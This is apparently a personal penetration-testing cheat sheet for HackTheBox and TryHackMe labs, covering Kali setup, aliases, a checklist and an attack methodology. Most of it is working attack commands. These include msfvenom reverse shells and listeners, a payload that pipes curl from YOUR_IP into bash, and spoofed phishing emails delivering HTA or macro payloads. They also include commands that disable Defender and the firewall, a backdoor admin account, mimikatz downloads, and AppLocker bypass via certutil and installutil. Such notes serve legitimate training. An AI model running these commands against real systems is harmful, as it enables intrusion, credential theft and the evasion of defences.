Hacking Fresh builds pimp-my-kali I use this to install all tools like impacket and so on .zshrc modifications I’ve created several aliases that I utilise throughout my hacking #custom alias alias grep='grep --color=auto' alias fgrep='fgrep --color=auto' alias egrep='egrep --color=auto' alias diff='diff --color=auto' alias ip='ip --color=auto' alias ss="searchsploit $1" alias l='ls -lAh' alias webup='ls -lah && ip a | grep tun0 && python3 -m http.server 8000' alias rtfm="/opt/rtfm/rtfm.py" alias xclip="xclip -sel c" alias ltr="ls -ltr" alias cdb="echo /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | xclip" alias clearwhite="sed 's/^[ \\t]*//' -i" alias thm="sudo openvpn /home/chevalier/Documents/vpn/thm/Chevalier.opvn" alias htb="sudo openvpn /home/chevalier/Documents/vpn/htb/lab_Chevalier.ovpn" alias update="sudo apt update -y && sudo apt upgrade -y && sudo apt dist-upgrade -y" alias buster="gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 64 -x .txt,.php,.html,.aspx -u" Structure I keep my VPN settings under ~/Documents/vpn/platform_name/ and all my labs or challenges under ~/labs/platform_name . What else? sudo msfdb init sudo apt install bloodyad sudo apt install terminator pipx install updog3 Configure bloodhound Configure ligolo-ng Browser plugins Hack-Tools # similar to revshells Wappalyzer # CMS identification User-Agent Switcher # exactly what it says on the tin FoxyProxy # for burpsuite Cheatsheets Quick Checklist Personal Checklist [ ] Enumeration [ ] nmap [ ] autorecon [ ] HTTP/S? [ ] gobuster/dirbuster [ ] nikto [ ] wpscan [ ] User - Privesc [ ] id [ ] lxd [ ] sudo -l [ ] gtfobins [ ] linpeas.sh [ ] SUID/GUID - gtfobins [ ] linenum.sh [ ] SUID/GUID - gtfobins [ ] cronjobs [ ] Root [ ] Profit! Markdown version # Checklist - [ ] Enumeration - [ ] nmap - [ ] autorecon - [ ] HTTP/S? - [ ] gobuster/dirbuster - [ ] nikto - [ ] wpscan - [ ] User - Privesc - [ ] id - [ ] lxd - [ ] sudo -l - [ ] gtfobins - [ ] [linpeas.sh]() - [ ] SUID/GUID - gtfobins - [ ] linenum.sh - [ ] SUID/GUID - gtfobins - [ ] cronjobs - [ ] Root - [ ] Profit! Advanced Methodology 1. Enumeration Automated approach autorecon TARGET_IP Manual approach nmap TARGET_IP -p- --min-rate 1400 -sV -T 4 -sC -oN output.txt If the target is Windows use the below nmap TARGET_IP -Pn -sV -T 4 -sC -oN output.txt #or this if you want to dive deeper nmap TARGET_IP -Pn -p- -sV -T 4 -sC -oN output.txt 2. Initial Access Phishing HTA payloads Ping TCPdump To catch the ping sudo tcpdump -i tun0 icmp HTA - Bypass CLM Compile the project https://github.com/blu3drag0nsec/osepvs/tree/main/tools/02.CLM/revshell/PSBypassCLM Convert to psby.txt using certutil certutil -encode "Z:\\tools\\02.CLM\\revshell\\PSBypassCLM\\PSBypassCLM\\bin\\x64\\Release\\PsBypassCLM.exe" psby.txt Download the psby.txt on the kali host and serve the file with a dropper HTA - With Meterpreter Generate the shellcode msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 -f csharp EXITFUNC=thread Run it through XORme Update hollow.xml with the code from above Set up listener msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost tun0; set lport 443;set exitfunc thread; exploit -j" Deliver it Macro VBA Generate the shellcode msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -f csharp Run it through caesar cypher - pay attention to shift and key parameters. Set up listener msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost tun0; set lport 443;set exitfunc thread; exploit -j" Update the vba with your shellcode from step 2. Sending emails swaks HTA payloads swaks --body 'Please check this issue here http://YOUR_IP/payload.hta' --add-header "MIME-Version: 1.0" --add-header "Content-Type: text/html" --header "Subject: Issues with my account" -t Will@domain.com -f administrator@domain.com --server EMAIL_server Macro payloads swaks --to jobs@domain.com --from administrator@domain.com --header "Subject: My CV" --body "Attached my cv to this email" --attach @cv.docm --server server.domain.tld 3. Privilege Escalation - Windows PowerUp Upload the following script to the host /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 Load on the target and run it . .\\PowerUp.ps1 Invoke-AllChecks Troubleshoot, make sure the service you are trying to abuse is actually started. Abusing services . .\\PowerUp.ps1 Invoke-AllChecks # if a service is discovered do the things over there -> Invoke-ServiceAbuse -Name 'Service' sc query Service sc config Service start=auto sc config Service obj=LocalSystem 4. Post Compromise Blast AV and enable RDP with hashes cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -removedefinitions -all REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" /v "DisableRealtimeMonitoring " /t REG_DWORD /d 1 /f REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" /v "DisableBehaviorMonitoring " /t REG_DWORD /d 1 /f NetSh Advfirewall set allprofiles state off cmd.exe /c netsh firewall set opmode disable && reg add "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f && reg add "HKLM\\System\\CurrentControlSet\\Control\\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f Sharphound → Bloodhound Dump all hashes and spray SMB winrm ldap wmi 5. Persistence Linux - SSH On your host cat ~/.ssh/id_rsa.pub # if you don't have one create run: ssh-key -t rsa # copy the content of the file into **authorized_keys** on the target host On the target host cd ~/.ssh/ ssh-keygen -t rsa # press enter twice cat id_rsa.pub > authorized_keys echo 'YOUR_PUB_KEY' >> authorized_keys Windows Create admin user cmd.exe /c net user hackerman Password123! /add && net localgroup "administrators" /add hackerman && net localgroup "remote desktop users" /add hackerman or net user hackerman Password123! /add && net localgroup "administrators" /add hackerman && net localgroup "remote desktop users" /add hackerman Enable RDP cmd.exe /c netsh firewall set opmode disable && reg add "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f && reg add "HKLM\\System\\CurrentControlSet\\Control\\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f or netsh firewall set opmode disable reg add "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKLM\\System\\CurrentControlSet\\Control\\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f 6. Pivot You can use the standard apt repos if you don’t need to do any modifications, e.g. bypassing Applocker or CLM. sudo apt install ligolo-ng ligolo-ng-common-binaries -y Basic tunnel start ligolo-proxy sudo ligolo-proxy -selfcert Connect the agent enter session and list network configuration #in ligolo-ng sessions ifconfig set route 1 hop autoroute start 2 hops AV evasion Clone the repository git clone Edit the ignoreCertificate and serverAddr variables in the following file /ligolo-ng/cmd/agent/main.go Compile the agent.exe using the following command GOOS=windows go build -o agent.exe cmd/agent/main.go Compile as x64 and give the name ApplockerBypassExternalBinary.exe - Github Repo Encode the file created above with certutil certutil.exe -encode .\\ApplockerBypassExternalBinary.exe AppLockerBypassLigolo.txt Rename the agent.exe to ligolo-agent.exe Serve the files ( ligolo-agent.exe and AppLockerBypassLigolo.txt Upload the files to the target Linux AD Tools required I usually install them under /opt/linuxad You will need to upload them on to the target host. Extracting keytab data Most likely you will need to be root to do this python KeytabParser.py /etc/krb5.keytab klist -k /etc/krb5.keytab ./keytabextract.py /etc/krb5.keytab CCACHE ticket ls /tmp/ | grep krb5cc # usual location To reuse Get a copy of the file on your kali change the permission of the file to 600 using chmod 600 set env variable export KRB5CCNAME=/location/ticket_name Blast Defender Via command prompt cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -removedefinitions -all Just to be safe 🙂 REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" /v "DisableRealtimeMonitoring " /t REG_DWORD /d 1 /f REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" /v "DisableBehaviorMonitoring " /t REG_DWORD /d 1 /f NetSh Advfirewall set allprofiles state off Powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true Tools autorecon Basic usage autorecon TARGET_IP Scanning multiple hosts autorecon -t targets.txt #or the below sudo $(which autorecon) TARGET_IP1 TARGET_IP2 TARGET_IP3 -vv nmap Base Syntax nmap {Targets} [ScanType] [Options] Target Purpose Example 1 target nmap IP scan multiple targets nmap IP1, IP2, IP3 scan a list nmap -iL list.txt scan CIDR range nmap 192.168.1.0/24 Ports Purpose Example Scan top 1k popular ports nmap IP Port range nmap -p x-y Port list nmap -p x,y,z linear portrange nmap -r x-y Probing Purpose Example Don't probe nmap IP -Pn Default probe nmap IP -PB ICMP Echo Request nmap IP -PE ICMP Timestamp Request nmap IP -PP ICMP Network Request nmap IP -PM Scan Type Purpose Example Probe only nmap IP -sn SYN Scan nmap IP -sS TCP Connect Scan nmap IP -sT UDP Scan nmap IP -su Version scan nmap IP -sV OS Detection nmap IP -PM Set TCP flags nmap IP --scanflags: x,y,z Timing Options Purpose Example Paranoid nmap IP -T0 Sneaky nmap IP -T1 Polite nmap IP -T2 Normal nmap IP -T3 Aggressive nmap IP -T4 Insane nmap IP -T5 Output Format Purpose Example Standard nmap IP -oN file.txt Greppable nmap IP -oG file.txt XML nmap IP -oX file.txt all formats nmap IP -oA file Misc Options Purpose Example Aggresive scan nmap IP -A nmap reason why a port is in a state nmap IP --reason wpscan Basic usage wpscan --url http://TARGET_IP Scan for plugins wpscan --url http://TARGET_IP -e p Scan for users wpscan --url http://TARGET_IP -e u Scan for vulnerable plugins wpscan --url http://TARGET_IP -e vp Brute force passwords wpscan --url http://TARGET_IP --passwords /usr/share/wordlists/rockyou.txt fuff Basic Usage ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://TARGET_IP:PORT/FUZZ nikto Basic usage nikto -host http://TARGET_IP -p PORT gobuster Basic usage gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt Enumerating with extensions (filter the extension based on target) gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,py,html,aspx Enumerating vhosts (after updating /etc/hosts gobuster vhost -u -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --ad netexec Enumeration SMB netexec smb targets.txt -u user_name -H 'NTLM_HASH' netexec smb TARGET_IP -u user_name -H 'NTLM_HASH' --groups --local-groups --loggedon-users --rid-brute --users --shares --pass-pol winrm netexec winrm targets.txt -u user_name -H 'NTLM_HASH' powerview 1. Enumerate common names Get-DomainComputer | select cn msf Linux payloads With commands msfvenom -p linux/x64/exec CMD='echo I love programming. && curl http://YOUR_IP/shell.php | bash' -f elf -o shellme.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -f csharp > payload.c Catch with msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost tun0; set lport 443;set exitfunc thread; exploit -j" rubeus Rubeus.exe asktgt /user:username /rc4:NTLM_hash /ptt powersploit Reset a user’s password $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force Set-DomainUserPassword -Identity nina -AccountPassword $UserPassword mimikatz You will need to first upload the binaries to the target, either via a meterpreter shell or powershell: meterpreter upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe upload /usr/share/windows-resources/mimikatz/x64/mimidrv.sys powershell powershell -ep bypass -c iwr YOUR_IP/mimikatz.exe -o .\\mimikatz.exe powershell -ep bypass -c iwr YOUR_IP/mimidrv.sys -o .\\mimidrv.sys ligolo-ng You can use the standard apt repos if you don’t need to do any modifications, e.g. bypassing Applocker or CLM. sudo apt install ligolo-ng ligolo-ng-common-binaries -y Basic tunnel start ligolo-proxy sudo ligolo-proxy -selfcert Connect the agent enter session and list network configuration #in ligolo-ng sessions ifconfig set route 1 hop autoroute start 2 hops AV evasion Clone the repository git clone https://github.com/nicocha30/ligolo-ng.git Edit the ignoreCertificate and serverAddr variables in the following file /ligolo-ng/cmd/agent/main.go Compile the agent.exe using the following command GOOS=windows go build -o agent.exe cmd/agent/main.go Compile as x64 and give the name ApplockerBypassExternalBinary.exe - Github Repo Encode the file created above with certutil certutil.exe -encode .\\ApplockerBypassExternalBinary.exe AppLockerBypassLigolo.txt Rename the agent.exe to ligolo-agent.exe Serve the files ( ligolo-agent.exe and AppLockerBypassLigolo.txt Upload the files to the target cmd.exe /c curl http:/YOUR_IP/ligolo-agent.exe -o C:\\users\\public\\try-agent.exe && curl http://YOUR_IP/AppLockerBypassLigolo.txt -o C:\\users\\public\\enc.txt && certutil -decode C:\\users\\public\\enc.txt C:\\users\\public\\ligolo.exe && del C:\\users\\public\\enc.txt && C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\installutil.exe /logfile= /LogToConsole=true /U C:\\users\\public\\ligolo.exe